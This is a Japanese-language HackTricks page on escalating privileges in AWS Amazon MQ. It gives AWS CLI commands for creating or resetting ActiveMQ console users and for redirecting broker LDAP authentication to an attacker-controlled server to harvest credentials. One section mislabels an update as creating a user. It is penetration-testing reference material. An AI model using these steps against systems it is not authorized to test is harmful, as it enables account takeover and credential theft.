AWS - MQ Privesc
Reading time: 4 minutes
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
MQ
MQに関する詳細情報は、以下を確認してください:
mq:ListBrokers
, mq:CreateUser
これらの権限を使用すると、ActiveMQブローカーに新しいユーザーを作成できます(これはRabbitMQでは機能しません):
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>
潜在的な影響: ActiveMQを通じて機密情報にアクセスする
mq:ListBrokers
, mq:ListUsers
, mq:UpdateUser
これらの権限を持つことで、ActiveMQブローカーに新しいユーザーを作成することができます(これはRabbitMQでは機能しません):
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>
潜在的な影響: ActiveMQを通じて機密情報にアクセス
mq:ListBrokers
, mq:UpdateBroker
ブローカーがActiveMQでLDAPを使用して認証している場合、攻撃者が制御するLDAPサーバーに使用される設定を変更することが可能です。これにより、攻撃者はLDAPを通じて送信されるすべての資格情報を盗むことができます。
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...
もしActiveMQで使用されている元の認証情報を見つけることができれば、MitM攻撃を実行し、認証情報を盗み、元のサーバーでそれを使用し、レスポンスを送信することができます(盗まれた認証情報を再利用するだけでこれを行うことができるかもしれません)。
潜在的な影響: ActiveMQの認証情報を盗む
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。